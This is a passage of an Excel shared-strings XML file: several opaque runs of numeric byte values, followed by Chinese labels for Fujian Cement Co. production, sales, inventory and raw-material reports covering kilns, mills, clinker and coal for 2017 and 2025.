    <t xml:space="preserve">168 205 219 50 31 232 163 47 142 17 170 79 248 233 153 12 88 78 20 106 169 147 132 225 73 180 137 63 77 24 186 68 251 243 143 51 174 252 191 20 63 18 51 126 96 37 110 198 236 6 60 192 240 128 67 70 234 93 63 5 68 85 174 30 241 77 226 3 64 84 223 26 111 98 116 44 237 84 192 39 1 151 2 230 155 248 225 205 155 0 183 0 214 1 238 4 220 7 120 0 240 16 224 171 128 63 4 124 199 196 143 132 184 7 136 7 169 198 65 183 139 159 150 83 0 31 7 68 165 202 116 137 127 221 198 79 6 184 85 28 39 242 136 126 248 25 105 142 216 66 70 149 162 68 97 146 8 29 232 23 47 44 41 140 22 42 109 255 6 248 38 224 5 241 9 230 174 200 7 110 50 227 22 180 25 100 176 0 38 1 206 1 124 90 200 251 93 33 243 15 0 255 29 240 156 137 171 153 94 6 188 1 248 159 128 31 2 226 161 176 40 239 196 199 58 216 196 100 192 73 128 227 5 162 223 116 64 27 224 52 129 154 31 94 31 237 96 170 83 154 170 219 47 69 86 78 198 77 177 57 249 49 247 140 255 228 63 129 109 128 62 241 121 64 212 63 168 35 95 75 216 222 140 41 168 43 44 5 79 203 12 221 227 135 230 53 41 168 177 38 73 163 226 226 205 241 82 156 249 165 111 210 1 209 109 26 31 205 232 69 41 244 191 219 69 79 95 0 215 22 184 22 11 123 37 104 169 100 9 240 129 250 29 111 146 76 9 163 164 248 132 160 137 168 16 180 241 95 35 237 132 56 91 196 94 219 162 89 148 250 35 163 204 18 66 204 212 87 146 126 68 21 197 89 58 234 160 233 239 226 208 242 84 156 9 129 107 176 142 179 88 117 150 131 16 2 180 119 84 66 114 151 144 222 210 224 184 166 136 184 76 196 253 213 177 80 220 60 200 109 173 136 43 177 248 193 70 176 34 114 248 172 248 216 93 35 174 77 164 51 104 102 14 75 91 42 99 39 33 73 183 41 218 182 248 96 157 235 56 235 23 239 155 197 193 220 96 34 52 227 217 48 210 205 131 145 118 41 91 193 42 216 183 88 39 84 241 75 210 207 36 155 61 197 62 217 62 205 62 203 158 49 </t>
  </si>
  <si>
    <t xml:space="preserve">195 228 144 28 113 142 120 199 104 199 35 142 177 142 36 199 120 135 205 49 201 97 82 37 53 65 29 173 38 170 227 212 71 213 41 234 116 117 185 234 84 55 169 21 234 115 106 239 87 190 167 152 198 54 178 191 5 217 83 237 83 237 22 199 24 71 162 99 156 195 234 72 118 164 56 44 32 223 82 117 163 250 190 250 225 31 45 213 63 143 234 78 56 197 142 176 111 183 77 248 51 228 65 50 182 246 135 5 249 223 56 72 29 185 89 244 75 167 133 191 115 24 113 49 236 184 233 63 30 199 78 141 254 197 99 167 77 235 126 241 24 254 54 193 222 32 52 248 171 171 234 234 234 189 246 45 46 123 99 115 157 189 182 206 158 179 190 196 190 189 190 198 53 111 236 216 49 51 5 143 3 251 255 112 243 231 31 255 99 187 134 121 159 253 83 251 59 112 61 113 239 24 93 103 220 123 133 174 197 181 213 110 124 30 220 211 207 101 108 29 244 59 111 254 170 47 40 106 47 12 23 143 152 232 248 97 142 56 80 78 16 253 131 67 228 202 202 221 102 209 226 131 63 194 40 228 254 167 146 181 95 187 88 69 191 98 13 246 47 250 174 32 103 22 182 19 206 242 178 229 79 208 230 36 33 50 38 55 196 23 138 121 248 171 95 28 11 166 8 129 236 17 130 113 175 205 243 106 170 188 120 10 205 109 73 228 61 88 6 33 0 209 187 231 53 54 53 86 51 145 7 167 8 231 28 20 206 185 121 218 39 207 232 147 201 47 41 91 85 150 159 225 64 93 116 163 21 25 96 128 1 6 24 96 128 1 6 24 96 128 1 6 252 229 195 131 31 102 202 74 109 166 92 119 56 75 62 102 205 146 155 0 11 182 100 202 191 118 103 202 47 166 100 200 79 150 166 203 51 155 150 200 119 109 25 242 251 127 147 46 75 240 236 248 254 44 249 127 166 103 200 190 51 89 242 191 108 77 151 231 228 166 203 191 89 149 46 207 158 159 33 191 2 207 95 169 206 148 107 222 200 148 127 144 147 46 39 204 200 144 127 251 86 150 124 250 104 186 220 250 230 108 185 15 194 238 135 244 214 0 239 209 167 50 229 141 5 233 242 205 35 153 242 197 206 76 121 218 214 76 185 0 </t>
  </si>
  <si>
    <t xml:space="preserve">226 154 170 51 228 91 127 159 46 239 57 154 37 239 170 205 144 139 102 102 200 63 237 202 144 95 125 61 83 254 37 240 255 37 132 249 20 120 119 229 129 60 112 191 188 34 83 206 41 74 151 159 249 143 52 249 98 124 134 220 210 145 33 159 152 152 37 191 147 146 37 231 190 145 37 191 5 105 101 64 62 63 123 97 137 252 220 154 116 249 191 236 153 242 143 33 237 55 64 254 37 73 153 242 67 240 123 183 48 157 148 31 83 196 98 250 220 19 78 182 5 48 109 60 95 12 155 4 254 124 106 248 226 88 125 98 147 213 9 180 141 232 17 162 133 68 29 68 187 136 38 19 189 72 180 148 104 55 209 83 68 15 18 245 18 125 153 104 42 81 51 209 62 162 140 211 241 72 95 163 251 114 162 187 136 14 16 189 71 212 67 52 141 104 22 81 39 209 26 162 183 136 174 35 106 33 110 115 232 254 50 209 60 162 110 162 55 136 246 242 144 68 15 19 189 74 244 1 209 219 68 167 18 157 73 180 149 168 157 104 34 209 179 68 55 19 237 33 218 78 180 159 232 105 162 39 137 46 35 106 229 121 39 217 142 211 125 39 209 125 68 23 19 189 67 244 16 209 6 162 57 68 175 88 241 237 184 91 39 58 89 223 221 160 54 164 67 183 165 113 235 205 132 35 45 47 207 207 62 177 96 153 180 227 191 207 136 159 127 224 155 157 155 141 38 219 132 5 141 5 140 142 30 89 56 15 159 226 70 186 119 146 147 174 169 112 197 208 121 41 156 163 94 239 242 8 248 89 28 78 218 63 106 152 136 225 248 38 212 237 147 201 204 3 238 94 120 142 223 87 113 255 166 108 213 146 199 250 167 167 135 213 165 221 97 174 49 65 11 33 253 83 156 44 49 25 210 235 119 80 130 22 22 218 173 198 95 182 204 4 222 136 189 19 156 172 149 113 35 40 184 81 230 143 210 222 209 180 166 183 158 5 179 169 187 163 143 63 90 190 122 33 77 231 44 39 187 5 153 193 60 173 198 118 0 215 116 250 253 37 183 83 222 2 169 237 132 235 14 182 133 126 125 173 253 170 91 251 109 180 102 169 94 211 239 197 31 245 97 216 6 163 219 253 127 3 88 239 180 189 246 52 </t>
  </si>
  <si>
    <t xml:space="preserve">168 31 175 65 189 209 218 67 42 184 223 219 253 120 203 231 5 62 231 137 77 199 190 243 155 154 247 218 199 208 185 218 38 106 43 122 232 1 183 102 137 7 1 121 46 158 200 121 117 78 226 97 173 14 126 189 2 97 227 180 254 23 191 7 183 241 214 144 95 95 211 236 113 45 208 87 105 150 202 240 59 94 28 80 243 28 11 125 57 70 91 241 252 27 93 147 219 229 241 44 90 72 31 42 75 242 132 149 95 52 72 138 227 34 182 101 74 215 204 174 44 12 201 250 106 15 56 30 233 246 74 106 175 27 251 130 211 87 177 163 186 170 246 50 254 209 83 240 156 87 227 241 208 135 95 224 203 45 199 54 146 97 222 149 200 163 16 226 109 22 188 111 232 121 247 134 120 123 7 241 14 179 27 161 109 111 7 221 8 248 45 177 138 90 38 99 67 219 93 224 159 50 7 255 96 21 191 183 233 45 45 172 14 179 180 192 68 188 193 191 243 102 108 164 118 34 52 158 92 110 254 171 125 110 83 133 231 11 243 18 105 107 1 97 28 99 131 194 159 222 122 241 228 119 215 78 177 190 213 202 190 199 178 150 189 133 111 254 133 87 58 139 221 101 43 217 220 130 125 59 206 183 222 216 145 190 237 251 237 203 220 73 149 41 37 146 67 43 59 252 136 141 163 254 39 155 187 154 210 158 229 79 39 149 174 160 116 240 157 242 120 220 31 253 144 111 175 235 215 30 238 19 153 2 231 139 54 147 180 189 241 202 202 29 91 170 138 93 213 57 46 180 189 90 237 13 250 173 108 220 57 200 175 172 170 177 196 229 5 42 220 104 87 24 42 116 181 238 121 105 147 55 247 5 157 59 167 185 129 223 175 110 116 161 113 225 32 175 188 70 87 83 179 199 155 237 118 85 63 175 247 135 123 52 204 174 221 99 98 116 191 14 143 204 115 109 207 174 242 120 244 242 232 188 215 213 232 252 243 235 169 169 4 221 208 130 10 240 235 68 100 126 87 214 53 213 234 203 1 221 165 245 27 234 106 53 63 16 134 155 75 70 59 230 141 193 112 16 162 180 94 68 230 225 188 141 217 85 222 208 125 125 195 206 32 95 204 59 149 154 206 13 97 214 213 54 133 202 118 141 171 14 </t>
  </si>
  <si>
    <t xml:space="preserve">219 161 107 21 157 147 200 19 211 158 173 93 28 42 115 136 23 150 183 13 91 48 130 62 159 107 235 106 189 97 233 134 165 35 210 102 58 185 33 72 89 149 39 84 86 193 124 64 29 8 150 63 220 135 229 105 125 93 80 70 173 79 197 241 89 187 239 156 18 49 23 21 254 87 116 240 17 128 222 189 33 112 103 239 157 100 55 14 231 53 175 82 103 84 227 127 2 175 47 222 105 135 94 180 164 236 89 191 235 206 165 220 126 43 4 88 116 211 95 113 207 95 49 224 175 232 241 87 92 244 87 156 242 87 116 249 43 142 251 43 14 158 193 169 208 162 110 229 156 23 146 252 228 251 254 163 13 112 245 31 245 16 117 19 45 39 154 71 52 139 104 26 209 84 162 22 162 3 15 145 246 17 189 65 244 50 209 139 68 59 137 30 6 74 201 41 231 90 31 98 98 178 73 181 225 108 47 176 4 103 144 129 229 56 215 252 232 31 240 116 5 27 78 98 11 21 31 10 80 168 218 112 50 27 232 15 140 83 58 144 95 113 153 90 52 245 230 7 190 238 111 37 201 83 221 87 82 157 172 12 194 224 228 119 81 247 222 115 24 98 73 82 71 247 103 55 2 253 138 130 12 84 27 78 143 183 250 62 77 218 55 23 186 222 211 102 38 181 249 125 14 120 112 6 181 123 252 10 101 199 231 68 170 96 6 47 249 240 5 204 156 236 100 151 124 152 49 236 175 149 14 188 83 20 44 134 192 52 154 123 95 115 247 66 218 110 243 100 77 118 245 221 192 85 69 193 2 228 57 82 175 23 186 19 39 163 191 223 183 153 248 150 139 57 159 66 105 22 41 29 152 92 177 226 67 174 133 242 98 69 193 0 69 170 13 103 245 126 223 213 135 24 7 11 50 142 36 192 59 37 255 56 228 7 30 243 132 84 27 78 175 149 142 52 206 7 217 21 114 33 129 57 50 43 150 205 170 13 39 226 123 47 38 243 124 225 216 194 243 133 70 194 149 220 227 16 1 93 144 44 46 44 182 250 186 147 246 161 198 137 204 100 21 144 245 93 27 192 226 193 114 85 109 184 52 224 101 172 38 249 126 194 134 87 154 253 15 121 105 254 4 179 238 255 17 214 18 165 163 47 88 156 </t>
  </si>
  <si>
    <t xml:space="preserve">234 53 46 88 22 4 241 255 136 138 89 20 118 57 61 141 154 59 121 129 200 31 47 44 197 151 198 31 102 241 172 231 241 24 229 84 174 161 18 80 109 184 130 114 207 130 233 240 71 254 81 161 138 70 245 164 72 84 52 107 161 90 156 167 175 58 139 110 10 78 170 13 151 40 242 12 33 131 106 59 196 157 92 64 238 228 121 57 61 73 95 121 74 100 85 188 99 81 212 226 197 171 182 78 94 207 133 240 169 156 43 247 228 217 83 124 13 60 229 227 92 80 11 15 130 75 40 165 3 29 197 110 180 165 173 218 22 83 149 193 55 163 16 45 84 242 187 32 224 157 65 85 197 194 217 166 242 36 203 121 121 69 43 225 81 90 177 77 229 121 50 5 43 14 14 181 129 13 93 197 216 128 79 82 186 253 84 85 251 68 85 245 31 237 37 247 13 17 86 161 88 192 184 143 103 30 253 33 181 195 220 179 147 60 55 244 64 113 224 186 49 48 13 87 146 88 11 119 66 92 40 93 173 236 177 116 3 185 93 190 110 239 138 173 123 179 76 205 79 43 249 61 144 67 92 137 6 242 187 158 90 153 236 247 157 5 86 75 87 90 27 147 84 219 102 238 29 32 63 37 217 135 61 163 191 99 51 56 62 22 79 161 81 130 11 194 248 126 230 93 182 117 239 211 166 230 12 37 183 167 48 156 99 183 224 152 40 56 146 135 146 200 217 41 155 144 93 162 198 14 93 212 106 76 238 238 73 88 212 81 222 32 138 84 148 24 224 73 39 74 32 63 174 161 177 223 192 46 87 189 30 184 10 89 12 228 37 198 17 111 168 252 228 15 101 214 64 141 89 82 109 103 233 157 36 138 214 97 75 164 58 215 42 172 17 242 242 89 72 229 51 103 152 185 57 223 43 125 60 42 84 96 32 157 89 42 116 95 158 164 239 208 176 43 11 249 104 162 42 202 46 117 72 33 221 87 33 206 240 88 229 183 1 31 159 135 87 192 6 170 128 33 62 91 47 229 238 195 30 208 203 11 20 135 143 66 55 46 194 85 27 110 83 20 246 5 238 105 189 147 162 180 242 74 70 97 69 160 169 212 69 232 163 221 166 160 135 121 208 78 170 143 84 90 184 27 242 209 158 207 241 69 </t>
  </si>
  <si>
    <t xml:space="preserve">186 111 225 75 228 45 36 48 141 182 76 174 105 239 52 247 32 132 197 253 147 211 15 38 225 171 199 246 113 134 186 55 106 224 151 124 216 0 22 195 240 224 87 176 178 239 189 99 13 244 248 199 4 148 7 56 18 126 205 236 95 101 9 248 204 216 69 174 74 132 218 98 133 128 74 254 193 162 96 151 214 75 217 182 67 207 112 227 97 168 69 6 150 119 106 163 76 254 69 109 20 40 167 225 134 54 104 174 131 204 235 82 131 21 15 203 147 154 142 146 127 170 72 72 219 158 170 181 86 33 109 223 67 109 188 59 78 210 14 232 165 189 163 147 246 222 67 146 22 82 46 226 221 179 214 189 170 239 98 248 43 1 171 127 124 160 208 236 47 50 7 10 45 254 34 75 192 153 232 95 153 40 75 238 147 148 185 83 80 132 180 27 117 13 10 238 6 101 111 142 168 194 215 121 250 103 33 220 105 18 202 23 42 194 171 84 186 88 8 202 134 139 197 193 126 132 15 147 148 112 79 192 2 162 230 153 65 206 64 158 197 255 53 74 120 85 34 151 137 122 26 144 203 119 11 175 43 205 129 14 100 138 210 249 110 147 143 94 192 104 162 233 6 140 143 55 42 29 30 93 131 14 107 139 161 193 66 116 209 74 71 42 15 59 196 184 20 234 96 47 132 87 69 100 109 21 172 7 215 218 252 30 237 125 99 53 0 114 10 73 87 145 12 1 178 40 192 113 244 56 8 36 172 17 224 70 226 133 64 254 237 26 63 233 250 86 62 183 49 240 97 197 133 131 26 28 3 240 204 10 237 131 237 122 146 13 210 71 210 96 63 60 59 4 120 2 240 117 192 183 1 175 3 254 22 240 30 160 37 141 177 20 192 57 128 78 192 114 64 55 224 14 192 253 128 71 0 95 3 60 11 88 34 177 182 119 224 122 11 240 46 224 0 224 168 217 140 205 0 92 8 232 4 60 6 97 138 225 186 25 208 11 184 27 240 18 248 93 6 60 4 247 39 240 25 220 95 1 60 5 247 151 1 223 3 236 3 252 20 15 104 77 135 181 41 224 76 192 197 128 121 128 223 0 252 87 8 15 235 160 54 55 220 127 19 176 29 240 8 224 247 0 223 6 124 15 240 54 224 61 64 243 </t>
  </si>
  <si>
    <t xml:space="preserve">83 176 86 5 76 5 76 7 92 12 152 243 20 47 143 72 29 170 202 236 181 213 245 180 204 174 172 170 145 43 183 54 120 171 234 88 172 245 86 180 245 142 126 29 66 28 106 106 119 84 110 207 88 28 226 216 232 218 190 96 200 149 24 95 97 69 95 151 13 177 146 141 182 210 12 73 176 104 161 110 197 203 133 30 106 253 171 173 175 98 172 128 117 171 34 253 106 54 44 197 5 25 181 97 50 52 106 94 80 198 77 181 161 82 205 118 63 223 228 125 126 56 235 195 200 117 183 88 55 195 219 244 120 86 55 215 209 249 240 98 225 44 202 186 138 191 190 168 171 89 144 226 133 70 93 14 171 93 13 222 188 170 186 26 143 171 145 133 189 173 200 92 208 203 20 111 188 144 199 195 227 174 163 172 52 195 215 174 225 43 79 146 192 83 191 109 208 123 26 84 106 220 43 230 138 91 191 194 14 139 21 206 185 49 202 238 70 248 186 155 13 185 3 129 59 28 95 176 31 17 109 191 33 123 173 254 29 68 174 174 245 171 124 96 181 189 217 195 227 68 180 58 109 87 131 158 185 90 27 98 174 242 117 187 47 6 24 96 128 1 6 24 96 128 1 6 24 96 128 1 6 24 96 128 1 6 24 96 128 1 127 25 128 191 161 207 162 163 14 233 52 111 86 206 88 27 234 215 57 225 138 159 114 210 132 85 141 80 56 19 233 31 183 197 240 63 60 200 63 142 45 104 198 223 231 179 182 133 112 189 12 215 69 205 100 208 102 80 124 212 1 29 24 36 23 215 239 180 152 162 251 167 198 240 79 139 225 159 5 151 194 149 192 79 2 25 132 142 117 121 54 215 19 215 220 237 217 60 190 230 238 202 97 172 79 23 254 240 26 70 231 159 117 69 156 226 104 161 115 12 203 88 9 171 164 179 96 139 225 110 45 91 207 10 192 141 167 190 174 102 220 152 238 57 243 239 31 134 126 85 192 88 164 253 17 51 27 108 145 36 135 104 25 233 92 106 231 122 173 101 117 116 98 21 194 76 138 85 10 79 209 30 76 147 208 235 228 231 232 32 140 54 119 153 209 238 137 9 100 242 138 147 194 182 69 225 148 67 97 28 108 49 224 211 116 93 69 101 51 135 180 103 </t>
  </si>
  <si>
    <t xml:space="preserve">53 123 209 152 198 78 200 81 21 217 164 65 64 75 100 219 137 43 234 131 78 128 176 92 255 187 134 53 147 174 167 62 108 164 102 56 35 254 168 29 172 201 19 126 14 16 2 234 143 59 132 17 3 7 133 13 231 31 25 35 60 252 56 8 191 86 28 24 211 8 87 212 111 13 73 212 68 86 210 106 232 152 23 70 117 31 45 75 175 167 82 218 70 121 226 250 176 92 182 186 168 241 230 209 81 52 174 224 251 140 99 118 187 68 109 2 107 202 130 102 187 221 74 150 113 176 30 45 108 182 90 185 11 107 217 162 102 180 37 161 153 115 208 172 231 116 199 108 177 162 229 181 181 137 179 86 219 240 22 176 141 117 119 99 44 149 254 81 57 154 46 248 167 210 55 218 33 251 1 75 127 11 82 85 237 111 105 96 73 16 186 191 129 241 43 11 187 82 163 77 106 99 227 122 241 102 220 93 126 233 29 86 95 195 229 0 60 0 237 28 58 155 110 200 125 119 2 96 82 20 220 195 216 37 85 23 71 229 54 55 236 188 111 10 150 83 155 244 213 150 211 159 20 14 168 9 13 122 151 170 38 180 8 15 11 255 164 158 208 194 61 180 79 236 218 243 160 187 129 133 185 67 69 253 85 184 219 219 245 238 144 11 221 232 186 123 87 115 135 187 16 134 114 253 31 131 26 21 206 171 234 3 182 7 26 192 116 24 163 18 0 241 186 103 128 153 212 225 227 10 117 32 78 85 7 86 168 234 125 53 54 132 215 115 83 180 33 66 47 235 16 242 46 219 163 94 120 48 125 96 197 131 132 251 234 131 233 128 123 238 171 159 171 67 227 121 245 254 131 229 234 253 11 231 213 129 101 43 224 250 197 242 14 89 94 221 127 254 242 50 102 113 6 24 96 128 1 6 24 48 124 248 95 253 </t>
  </si>
  <si>
    <t>福建水泥股份有限公司日报表</t>
  </si>
  <si>
    <t>计量单位：吨</t>
  </si>
  <si>
    <t xml:space="preserve">                        序时进度                           </t>
  </si>
  <si>
    <t>2017年12月月报</t>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>表号</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>:</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>福泥运统字001</t>
    </r>
  </si>
  <si>
    <t>项目</t>
  </si>
  <si>
    <t>月计划</t>
  </si>
  <si>
    <t>期初库存</t>
  </si>
  <si>
    <t>日生产/进厂</t>
  </si>
  <si>
    <t>月累计</t>
  </si>
  <si>
    <t>年累计</t>
  </si>
  <si>
    <t>日消耗/出厂</t>
  </si>
  <si>
    <t>期末库存</t>
  </si>
  <si>
    <t>库容率%</t>
  </si>
  <si>
    <t>台时产量（t/h，kwh/t）</t>
  </si>
  <si>
    <t>运转率（%）</t>
  </si>
  <si>
    <t>运行时间（h）</t>
  </si>
  <si>
    <t>日</t>
  </si>
  <si>
    <t>月</t>
  </si>
  <si>
    <t>年</t>
  </si>
  <si>
    <t>公司合计</t>
  </si>
  <si>
    <t>水泥生产/出厂</t>
  </si>
  <si>
    <t>主机设备运行情况</t>
  </si>
  <si>
    <t>安砂建福</t>
  </si>
  <si>
    <t>回转窑</t>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>中</t>
    </r>
  </si>
  <si>
    <t>P.O52.5</t>
  </si>
  <si>
    <t>水泥磨1</t>
  </si>
  <si>
    <t>PII42.5</t>
  </si>
  <si>
    <t>水泥磨2</t>
  </si>
  <si>
    <t>P.042.5R</t>
  </si>
  <si>
    <t>永安建福</t>
  </si>
  <si>
    <t>P.042.5</t>
  </si>
  <si>
    <t>水泥磨A1</t>
  </si>
  <si>
    <t>P.C32.5R</t>
  </si>
  <si>
    <t>水泥磨D1</t>
  </si>
  <si>
    <t>P.C32.5</t>
  </si>
  <si>
    <t>水泥磨D2</t>
  </si>
  <si>
    <t>熟
料</t>
  </si>
  <si>
    <t>进厂</t>
  </si>
  <si>
    <t>自产</t>
  </si>
  <si>
    <t>海峡水泥</t>
  </si>
  <si>
    <t>外购</t>
  </si>
  <si>
    <t>出厂</t>
  </si>
  <si>
    <t>权属调拨</t>
  </si>
  <si>
    <t>外发熟料</t>
  </si>
  <si>
    <t>金银湖水泥</t>
  </si>
  <si>
    <t>总销量</t>
  </si>
  <si>
    <t>水泥销售量</t>
  </si>
  <si>
    <t>炼石厂</t>
  </si>
  <si>
    <t>回转窑8#</t>
  </si>
  <si>
    <t>袋装</t>
  </si>
  <si>
    <t>回转窑5#</t>
  </si>
  <si>
    <t>散装</t>
  </si>
  <si>
    <t>回转窑4#</t>
  </si>
  <si>
    <t>商品熟料</t>
  </si>
  <si>
    <t>福州炼石</t>
  </si>
  <si>
    <t>宁德建福</t>
  </si>
  <si>
    <t>余热发电</t>
  </si>
  <si>
    <t>炼石厂1</t>
  </si>
  <si>
    <t>炼石厂2</t>
  </si>
  <si>
    <t>监控指标</t>
  </si>
  <si>
    <t>主
要
原
燃
材
料
动
态</t>
  </si>
  <si>
    <t>材料名称</t>
  </si>
  <si>
    <t>计划</t>
  </si>
  <si>
    <t>日进厂</t>
  </si>
  <si>
    <t>月累
进厂</t>
  </si>
  <si>
    <t>年累
进厂</t>
  </si>
  <si>
    <t>日消耗</t>
  </si>
  <si>
    <t>月累消耗</t>
  </si>
  <si>
    <t>年累消耗</t>
  </si>
  <si>
    <t>无烟煤</t>
  </si>
  <si>
    <t>烟煤</t>
  </si>
  <si>
    <t>石膏</t>
  </si>
  <si>
    <t>铁粉</t>
  </si>
  <si>
    <t>混合煤</t>
  </si>
  <si>
    <t>设备运行状况</t>
  </si>
  <si>
    <t>熟料</t>
  </si>
  <si>
    <t>外购熟料</t>
  </si>
  <si>
    <t>市场部</t>
  </si>
  <si>
    <t>备注</t>
  </si>
  <si>
    <t>中转库</t>
  </si>
  <si>
    <t>报出时间：</t>
  </si>
  <si>
    <t>福建水泥股份有限公司生产日报表</t>
  </si>
  <si>
    <t>2025年11月报</t>
  </si>
  <si>
    <t>回转窑1</t>
  </si>
  <si>
    <t>回转窑2</t>
  </si>
  <si>
    <t>P.P32.5</t>
  </si>
  <si>
    <t>水泥磨3</t>
  </si>
  <si>
    <t>M32.5</t>
  </si>
  <si>
    <t>水泥磨4</t>
  </si>
  <si>
    <t>P.P32.5R</t>
  </si>
  <si>
    <t>德化1#</t>
  </si>
  <si>
    <t>德化2#</t>
  </si>
  <si>
    <t>5735.53</t>
  </si>
  <si>
    <t>4026.50</t>
  </si>
  <si>
    <t>4068.50</t>
  </si>
  <si>
    <t>4196.22</t>
  </si>
  <si>
    <t>顺昌炼石</t>
  </si>
  <si>
    <t>5480.88</t>
  </si>
  <si>
    <t>安砂建福1#</t>
  </si>
  <si>
    <t>安砂建福2#</t>
  </si>
  <si>
    <t>顺昌炼石1#</t>
  </si>
  <si>
    <t>顺昌炼石2#</t>
  </si>
  <si>
    <t>德化</t>
  </si>
  <si>
    <t>安砂建福德化</t>
  </si>
  <si>
    <t>安砂</t>
  </si>
  <si>
    <t>曹远</t>
  </si>
  <si>
    <t>大湖</t>
  </si>
  <si>
    <t>顺昌</t>
  </si>
  <si>
    <t>回转窑4k</t>
  </si>
  <si>
    <t>回转窑5k</t>
  </si>
  <si>
    <t>回转窑8k</t>
  </si>
  <si>
    <t>闽侯</t>
  </si>
  <si>
    <t>漳州</t>
  </si>
  <si>
    <t>宁德</t>
  </si>
  <si>
    <t>顺昌1</t>
  </si>
  <si>
    <t>顺昌2</t>
  </si>
  <si>
    <t>原料耗</t>
  </si>
  <si>
    <t>年度累计</t>
  </si>
  <si>
    <t>生料耗</t>
  </si>
  <si>
    <t>熟料耗</t>
  </si>
  <si>
    <t>煤损耗</t>
  </si>
  <si>
    <t>水泥耗</t>
  </si>
  <si>
    <t>销售</t>
  </si>
  <si>
    <t>M22.5</t>
  </si>
  <si>
    <t>2025年12月调整表</t>
  </si>
  <si>
    <t>2025年12月报</t>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>福建水泥</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color indexed="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>基地工厂产销、发运、库存情况表</t>
    </r>
  </si>
  <si>
    <t>外放熟料</t>
  </si>
  <si>
    <t>外租场地</t>
  </si>
  <si>
    <t>2025年</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>生产/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>进厂</t>
    </r>
  </si>
  <si>
    <t>库存</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">库容(万吨)
</t>
    </r>
    <r>
      <rPr>
        <sz val="9"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>（不含落地）</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">库容率
</t>
    </r>
    <r>
      <rPr>
        <sz val="9"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>（不含落地）</t>
    </r>
  </si>
  <si>
    <t>日实际</t>
  </si>
  <si>
    <t>年计划</t>
  </si>
  <si>
    <t>年完成率</t>
  </si>
  <si>
    <t>合计</t>
  </si>
  <si>
    <t>落地</t>
  </si>
  <si>
    <t>库内</t>
  </si>
  <si>
    <t>金银湖</t>
  </si>
  <si>
    <t>福炼</t>
  </si>
  <si>
    <t xml:space="preserve"> 其中安砂1</t>
  </si>
  <si>
    <t xml:space="preserve"> 其中安砂2</t>
  </si>
  <si>
    <t>永安</t>
  </si>
  <si>
    <t xml:space="preserve"> 其中炼石1</t>
  </si>
  <si>
    <t xml:space="preserve"> 其中炼石2</t>
  </si>
  <si>
    <t>其中外供库</t>
  </si>
  <si>
    <t>安砂德化进厂</t>
  </si>
  <si>
    <t>水泥</t>
  </si>
  <si>
    <t>其中安砂</t>
  </si>
  <si>
    <t>基地</t>
  </si>
  <si>
    <t>煤炭库存</t>
  </si>
  <si>
    <t>其中安砂德化</t>
  </si>
  <si>
    <t xml:space="preserve"> </t>
  </si>
  <si>
    <t>月报</t>
  </si>
  <si>
    <t>生产/进厂</t>
  </si>
  <si>
    <t>求和项:实发数量</t>
  </si>
  <si>
    <t>库存组织</t>
  </si>
  <si>
    <t>月累</t>
  </si>
  <si>
    <t>年累</t>
  </si>
  <si>
    <t>1-11月年累</t>
  </si>
  <si>
    <t>安砂德化</t>
  </si>
  <si>
    <t>水泥销总计</t>
  </si>
  <si>
    <t>安砂商品熟料</t>
  </si>
  <si>
    <t>福炼商品熟料</t>
  </si>
  <si>
    <t>金银湖商品熟料</t>
  </si>
  <si>
    <t>顺昌炼石商品熟料</t>
  </si>
  <si>
    <t>永安商品熟料</t>
  </si>
  <si>
    <t>熟料销总计</t>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="14"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>福建水泥</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="14"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>基地工厂主要指标监控表</t>
    </r>
  </si>
  <si>
    <t>工厂</t>
  </si>
  <si>
    <t>2016年均</t>
  </si>
  <si>
    <t>2017年均</t>
  </si>
  <si>
    <t>2018年均</t>
  </si>
  <si>
    <t>2019年均</t>
  </si>
  <si>
    <t>2020年均</t>
  </si>
  <si>
    <t>2021年均</t>
  </si>
  <si>
    <t>2022年均</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>2</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>023年均</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
